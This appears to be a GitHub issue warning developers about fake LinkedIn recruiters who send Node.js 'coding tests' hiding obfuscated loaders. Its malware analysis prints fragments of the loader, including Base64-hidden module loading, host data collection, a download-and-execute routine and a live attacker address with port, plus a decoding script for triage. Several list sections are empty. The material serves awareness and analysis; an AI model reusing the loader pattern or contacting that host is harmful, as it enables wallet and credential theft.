coolcode / octotype

Web3 Vagabond
https://web3v.netlify.app

How do scammers impersonate recruiters on LinkedIn to steal applicants’ cryptocurrency wallet private keys? #2

Open coolcode opened 1 month ago

coolcode commented 1 month ago

Beware of LinkedIn Scammers Impersonating Recruiters to Steal Cryptocurrency Wallet Private Keys

Introduction

The rise of cryptocurrency has brought about incredible opportunities, but it has also attracted malicious actors looking to exploit unsuspecting individuals. A concerning trend has emerged where scammers impersonate recruiters on LinkedIn to deceive applicants and steal their cryptocurrency wallet private keys. This blog post outlines the process these attackers use to carry out their schemes and provides guidance on how to protect yourself.


The Scam Process

1. Attackers Pose as Recruiters on LinkedIn

Scammers create fake LinkedIn profiles, masquerading as recruiters from reputable companies in the tech or cryptocurrency sectors. They often use:

Their goal is to establish credibility and lure in professionals seeking new opportunities.

2. Attackers Request Completion of a Coding Test

Once contact is made, the fake recruiter expresses interest in your background and skills. They invite you to participate in a technical assessment or coding test as part of the hiring process. This seems like a standard procedure, which lowers your guard.

3. The Malicious Node.js Project

The coding test provided is a Node.js project that appears normal at first glance. However, hidden within the code is a compressed or obfuscated JavaScript script designed to:

Because the malicious code is embedded and concealed, even developers may overlook it during a casual review.

4. Attackers Drain Cryptocurrency Assets

With access to your private keys, the attackers can:

Victims often discover the theft too late, with little recourse to recover their lost assets.


How to Protect Yourself

Verify Recruiter Authenticity

Exercise Caution with Coding Tests

Protect Your Cryptocurrency Wallets

Stay Informed and Vigilant


Conclusion

The ingenuity of scammers continues to evolve alongside technology. By understanding their methods, you can better defend against their tactics. Remember that legitimate recruiters will respect your security and privacy—they will never require you to compromise your personal information or run suspicious code.

Stay cautious, protect your assets, and share this information to help others avoid falling victim to these scams.


If you have experienced or observed similar scams, consider reporting them to LinkedIn and relevant authorities to aid in the fight against cybercrime.


This code is a highly obfuscated JavaScript script whose primary function is to download an executable file or script from a remote server and execute it on the victim's computer. Here's a detailed analysis of the code:

  1. Code Obfuscation and Self-Protection:

    • The code uses numerous meaningless variable names and functions, such as E(a,b), aO, ax, etc.
    • It employs function redefinitions and loops to confuse the code logic, making it difficult to read and understand directly.
    • It hides actual string representations within encoded or calculated values through numerical and string manipulations.
  2. Dynamic Decoding and Module Loading:

    • The code uses Buffer.from() and toString() methods to decode encoded strings, such as decoding Base64-encoded strings into readable module names or file paths.
    • It dynamically loads Node.js core modules like fs (File System), os (Operating System information), path (Path handling), etc.
  3. Collecting System Information:

    • It retrieves the victim's home directory, hostname, platform type, and user information:
      hd = M['homedir'](),
      hs = M['hostname'](),
      pl = M['platform'](),
      uin = M['userInfo']();
    • This information may be used to identify the infected machine or to customize malicious behavior.
  4. Network Requests and Data Transmission:

    • The code uses the request module to send HTTP requests, potentially to communicate with the attacker's server:
      rq = require(O('cZm9ybURhdGE')),
      pt = require(O('adXJs')),
      ex = require(O('d3JpdGVGaWxlU3luYw'))[O('Z2V0')],
      zv = require(O('YcGxhdGZvcm0'));
    • It constructs an HTTP request containing the collected system information and sends it to the attacker's server.
  5. Downloading and Executing Malicious Code:

    • It constructs a download link to obtain malicious code from a remote server:
      const a0 = () => {
        let ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ=  ';
        // String manipulation and decoding to get the URL (elided here; the full function is walked through in the URL analysis)
        return Q(az) + Q(ay);
      };
    • The code saves the downloaded content to the victim's file system, typically in a hidden folder within the home directory.
    • It uses the child_process module to execute the downloaded code, which could be a reverse shell or another malicious payload.
  6. Scheduled Tasks and Persistence:

    • The code sets up a timer using setInterval to re-run its main malicious routine, av(); reading the counter au (assumed to start at 0), av() runs on the first two ticks (10 and 20 minutes after start) and the interval is cleared on the third, so the routine is retried on a schedule rather than left running indefinitely:
      let aw = setInterval(() => {
        (au += 1) < 3 ? av() : clearInterval(aw);
      }, 0x927c0); // Interval time is 0x927c0 (600,000 milliseconds, i.e., 10 minutes)

Summary:

The primary purpose of this code is to download and execute remote malicious code on the victim's computer, potentially for:

Recommendations:


Analysis of the Download URL:

The code constructs a download URL in a highly obfuscated manner. Here's the step-by-step analysis:

  1. Locating the Function that Builds the Download URL:

    const a0 = () => {
      let ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ=  ';
      for (var ay = '', az = '', aA = '', aB = '', aC = 0x0; aC < 0xa; aC++) {
        ay += ax[aC];
        az += ax[0xa + aC];
        aA += ax[0x14 + aC];
        aB += ax[0x1e + aC];
      }
      return (ay = ay + aA + aB), Q(az) + Q(ay);
    };
  2. Parsing the String Segments:

    • Initial String: ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ=  '; (40 characters, including the two trailing spaces that pad the last segment to 10)
    • Splitting the String:
      • ay: Takes 10 characters starting from ax[0].
      • az: Takes 10 characters starting from ax[10].
      • aA: Takes 10 characters starting from ax[20].
      • aB: Takes 10 characters starting from ax[30].
    • Combining Strings:
      • ay = ay + aA + aB;
      • The resulting ay and az are then passed to the function Q for decoding.
  3. Function Q and Decoding:

    const Q = (ax) => Buffer.from(ax, 'base64').toString('utf8');
    • This function decodes a Base64-encoded string into a UTF-8 string.
  4. Decoding Process:

    • Extracted Strings:
      • az = 'aHR0cDovLw'; // Base64 encoded string
      • ay = 'MTQ3LjEyNC4yMTQuMTI5OjEyNDQ='; // Base64 encoded string (note the padding '=')
    • Decoding:
      • Q(az) decodes to 'http://'.
      • Q(ay) decodes to '147.124.214.129:1244'.
  5. Constructing the Download URL:

    • Combining the decoded strings:
      const downloadUrl = Q(az) + Q(ay);
      // downloadUrl = 'http://' + '147.124.214.129:1244';
    • The final download URL is:
      http://147.124.214.129:1244
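Added example, not code from the scam project or the original post: a small Node.js triage script that reproduces the decoding steps from the analysis above (the Base64 module-name loading in sections 2 and 4, and the a0() URL walk-through) so a reviewer can check a suspect "coding test" offline. It assumes the O() helper strips one leading junk character before Base64-decoding; that is inferred from the quoted calls, since O() itself is not shown on the page.

```javascript
// Added triage helper, not code from the scam project. It reproduces the two
// decoding tricks described above so a reviewer can inspect a suspicious
// Node.js "coding test" offline. Literals in SAMPLE are copied from the analysis.

// Q() in the sample: plain Base64 to UTF-8. Node ignores whitespace inside
// Base64 input, which is why the trailing spaces in ax do not break decoding.
function q(s) {
  return Buffer.from(s, 'base64').toString('utf8');
}

// Reproduces a0(): ax is read as four 10-character slices; slice 1 holds the
// scheme and slices 0, 2 and 3 are concatenated into host:port.
function recoverUrl(ax) {
  const slice = (i) => ax.slice(10 * i, 10 * (i + 1));
  return q(slice(1)) + q(slice(0) + slice(2) + slice(3));
}

// Heuristic scan for Base64-looking string literals that decode to something
// identifier- or URL-like. The quoted O() calls carry one junk character in
// front of the real Base64 (O() itself is not shown on the page, so treating
// it that way is an assumption), so each literal is tried as-is and again
// with its first character dropped.
const LOOKS_DECODED = /^[A-Za-z0-9_./:-]{3,}$/;

function findEncodedLiterals(source) {
  const hits = [];
  const re = /'([A-Za-z0-9+/=]{4,})'/g;
  for (let m = re.exec(source); m !== null; m = re.exec(source)) {
    for (const candidate of [m[1], m[1].slice(1)]) {
      const decoded = q(candidate);
      if (LOOKS_DECODED.test(decoded)) {
        hits.push({ literal: m[1], decoded });
        break;
      }
    }
  }
  return hits;
}

// Constructed excerpt built from the require() calls quoted in the analysis.
const SAMPLE = [
  "rq = require(O('cZm9ybURhdGE')),",
  "pt = require(O('adXJs')),",
  "ex = require(O('d3JpdGVGaWxlU3luYw'))[O('Z2V0')],",
  "zv = require(O('YcGxhdGZvcm0'));",
].join('\n');

console.log(recoverUrl('MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ=  '));
console.log(findEncodedLiterals(SAMPLE).map((h) => h.decoded).join(', '));
```

Running it prints the same URL the walk-through derives by hand and the module and API names hidden behind the O() calls, which is a quick way to confirm that a "normal-looking" project is doing dynamic loading it has no reason to do.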

Summary:

Recommendations:


Please Note: Interacting with or analyzing malicious code should be done with caution and preferably within a secure, isolated environment (like a virtual machine) to prevent unintended consequences.

coolcode commented 1 month ago

Looks good to me